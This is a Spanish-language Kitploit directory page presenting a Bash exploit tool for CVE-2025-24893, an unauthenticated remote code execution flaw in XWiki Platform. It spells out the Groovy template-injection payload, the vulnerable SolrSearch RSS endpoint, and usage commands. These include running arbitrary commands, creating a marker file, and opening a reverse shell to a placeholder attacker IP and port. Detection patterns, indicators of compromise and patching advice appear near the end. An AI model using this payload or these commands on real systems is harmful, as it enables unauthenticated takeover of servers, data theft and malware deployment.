Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
XWiki-Platform-RCE-CVE-2025-24893 — Exploit de Bash para CVE-2025-24893, RCE no autenticado en XWiki Platform, que utiliza inyección de plantillas en la macro SolrSearch para ejecutar comandos arbitrarios del sistema. | Kitploit
Herramientas/GitHubGitHub/0xdtc/xwiki-platform-rce-cve-2025-24893
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHub0xdtc/xwiki-platform-rce-cve-2025-24893

XWiki-Platform-RCE-CVE-2025-24893

Exploit de Bash para CVE-2025-24893, RCE no autenticado en XWiki Platform, que utiliza inyección de plantillas en la macro SolrSearch para ejecutar comandos arbitrarios del sistema.

Ver Repositorio
40hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de RCE no autenticado en XWiki Platform

Descripción general

Este script es una implementación renovada en Bash de un exploit que apunta a las versiones de XWiki Platform afectadas por CVE-2025-24893. Aprovecha una vulnerabilidad crítica de ejecución remota de código no autenticado que permite a atacantes ejecutar código Groovy arbitrario mediante un fallo de inyección de plantillas en la macro SolrSearch.

Las implementaciones originales del exploit en Python fueron creadas por varios investigadores de seguridad y se adaptan aquí para usuarios de Bash con una ejecución simplificada y usabilidad mejorada.

Detalles de la vulnerabilidad

  • Descubridor: John Kwak (Trend Micro's Zero Day Initiative)
  • CVE: CVE-2025-24893
  • Puntuación CVSS: 9.8 (Crítica)
  • Referencias:
    • Aviso de seguridad oficial de XWiki (GHSA-rr6p-3pfg-562j)
    • Catálogo de vulnerabilidades explotadas conocidas de CISA
    • VulnCheck - XWiki CVE-2025-24893 explotado en la naturaleza
    • Blog de OffSec - RCE no autenticado en XWiki
  • Descripción: La vulnerabilidad se origina en una desinfección incorrecta de las entradas en la macro SolrSearch dentro de XWiki Platform. La macro no valida ni desinfecta adecuadamente la entrada proporcionada por el usuario en el parámetro text cuando se accede a través del endpoint RSS de medios, lo que permite a los atacantes inyectar código Groovy malicioso en la cadena de renderizado sin autenticación.

Versiones afectadas y parcheadas

Versiones afectadas

  • XWiki Platform: 5.3-milestone-2 a 15.10.10
  • XWiki Platform: 16.0.0-rc-1 a 16.4.0

Versiones parcheadas

  • XWiki 15.10.11 o posterior
  • XWiki 16.4.1 o posterior
  • XWiki 16.5.0RC1 o posterior

Características

  • RCE no autenticado: Ejecuta comandos arbitrarios del sistema sin autenticación.
  • Omisión de token CSRF: Explota la inyección de plantillas sin necesidad de tokens CSRF.
  • Ejecución en segundo plano: Los comandos se ejecutan de forma asíncrona en el servidor objetivo.
  • Interfaz de línea de comandos simple: Script Bash fácil de usar con dependencias mínimas.

Requisitos previos

  • Dependencias:
    • curl: Para enviar solicitudes HTTP.
    • jq: Para la codificación URL del payload.
    • Shell Bash.
  • Entorno probado: SO Linux con Bash.

Uso

Otorga los permisos de ejecución:

chmod +x CVE-2025-24893

Ejecuta el script con los argumentos requeridos:

./CVE-2025-24893 <url_objetivo> <comando>

Parámetros

ParámetroDescripción
<url_objetivo>La URL de XWiki objetivo (ej., http://ejemplo.com o https://xwiki.ejemplo.org). El protocolo es opcional.
<comando>El comando del sistema a ejecutar en el servidor objetivo.

Ejemplo

Verificar si el objetivo es vulnerable (ejecutar el comando id):

./CVE-2025-24893 http://xwiki-vulnerable.ejemplo.com "id"

Obtener información del sistema:

./CVE-2025-24893 http://xwiki-vulnerable.ejemplo.com "uname -a"

Crear un archivo de prueba:

./CVE-2025-24893 http://xwiki-vulnerable.ejemplo.com "touch /tmp/pwned"

Shell inversa (reemplaza con tu IP y puerto):

./CVE-2025-24893 http://xwiki-vulnerable.ejemplo.com "bash -c 'bash -i >& /dev/tcp/TU_IP/TU_PUERTO 0>&1'"

Flujo de trabajo del script

  1. Análisis de argumentos de línea de comandos:

    • Valida que tanto la URL objetivo como el comando estén presentes.
    • Normaliza la URL añadiendo http:// si no se especifica un protocolo.
  2. Construcción del payload:

    • Construye un payload de código Groovy que ejecuta el comando especificado usando .execute().
    • Envuelve el payload en la sintaxis de macro de XWiki: }}}{{async async=false}}{{groovy}}<código>{{/groovy}}{{/async}}
  3. Codificación URL:

    • Codifica el payload en URL usando jq para una transmisión HTTP adecuada.
  4. Explotación:

    • Envía una solicitud HTTP GET al endpoint vulnerable de SolrSearch: /xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload_codificado>
    • El comando se ejecuta en segundo plano en el servidor objetivo.

Detalles técnicos

Mecanismo de explotación

La cadena de explotación funciona de la siguiente manera:

  1. Inyección de plantillas: El atacante crea un payload malicioso que contiene código Groovy envuelto en sintaxis de macro de XWiki.
  2. Apuntar al endpoint: El payload se envía al endpoint RSS vulnerable de SolrSearch.
  3. Ejecución de código: El código Groovy inyectado se ejecuta del lado del servidor sin autenticación.
  4. Compromiso del sistema: El atacante obtiene ejecución de código arbitrario con los privilegios de la aplicación XWiki.

Estructura del payload

}}}{{async async=false}}{{groovy}}'<comando>'.execute();{{/groovy}}{{/async}}
  • }}} - Cierra cualquier contexto de macro existente
  • {{async async=false}} - Asegura una ejecución síncrona
  • {{groovy}}...{{/groovy}} - Envuelve el código Groovy malicioso
  • '<comando>'.execute(); - Ejecuta el comando del sistema especificado

Prueba de concepto

Configuración del entorno vulnerable

Para fines de prueba, puedes configurar una instancia vulnerable de XWiki usando Docker:

docker run -d -p 8080:8080 --name xwiki-vulnerable xwiki:15.10.10

Demostración de explotación

# Espera a que XWiki se inicie (puede tardar 1-2 minutos)
./CVE-2025-24893 http://localhost:8080 "whoami"

Impacto

La explotación exitosa de esta vulnerabilidad permite a un atacante no autenticado:

  • Ejecutar comandos arbitrarios del sistema en el servidor
  • Leer, modificar o eliminar datos sensibles
  • Comprometer toda la instalación de XWiki
  • Moverse lateralmente a otros sistemas en la red
  • Implementar mineros de criptomonedas u otro malware
  • Establecer acceso persistente de puerta trasera

Explotación en el mundo real

Según CISA y múltiples proveedores de seguridad:

  • Explotación activa: CVE-2025-24893 se está explotando activamente en la naturaleza
  • Campañas de ataque: VulnCheck detectó cadenas de ataque de dos etapas que implementan mineros de criptomonedas
  • Catálogo KEV de CISA: Agregado al catálogo de Vulnerabilidades Explotadas Conocidas el 30 de octubre de 2025
  • Escaneo masivo: Escaneo masivo a nivel de Internet en busca de instancias vulnerables

Detección y mitigación

Detección

Monitorea solicitudes sospechosas al endpoint SolrSearch:

GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=*

Busca patrones que contengan:

  • {{groovy}}
  • {{async}}
  • .execute()
  • Variaciones codificadas en URL de lo anterior

Indicadores de compromiso (IoCs)

  • Procesos inesperados generados por el usuario de la aplicación XWiki
  • Archivos nuevos en /tmp u otros directorios con permisos de escritura
  • Conexiones de red salientes a IPs desconocidas
  • Procesos de minería de criptomonedas (uso elevado de CPU)

Mitigación

  1. Actualiza XWiki a una versión parcheada:
    • Versión 15.10.11 o posterior
    • Versión 16.4.1 o posterior
    • Versión 16.5.0RC1 o posterior
Descargar herramienta